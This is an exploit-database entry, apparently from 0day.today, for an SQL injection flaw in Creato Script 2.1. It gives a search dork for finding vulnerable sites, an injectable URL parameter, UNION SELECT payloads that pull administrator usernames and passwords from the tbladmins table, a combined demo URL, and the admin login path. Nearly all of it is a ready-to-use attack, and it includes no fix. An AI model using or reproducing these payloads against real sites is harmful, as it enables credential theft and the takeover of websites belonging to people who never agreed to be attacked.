Creato Script SQL Injection Vulnerability

2010-05-30T00:00:00
ID 1337DAY-ID-12462
Type zdt
Reporter Mr.P3rfekT
Modified 2010-05-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =========================================
Creato Script SQL Injection Vulnerability
=========================================


# Title:  Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site:  http://www.creato.biz
# Tested on Lunix
# CVE : N/A
    
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "
 
 
# Helllo Allz.
    
    
# Exploit :
    
http://[site]/mainpage.php?id={SQLi}
 
 
 
# Poc Username:
 
union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
 
# Poc Password:
 
# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
 
# Demo:
 
 http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
  
# Admin Login
 
 
# http://[site]/admun/login.php
 
# ./done.
   
    
####################################################################



#  0day.today [2018-01-08]  #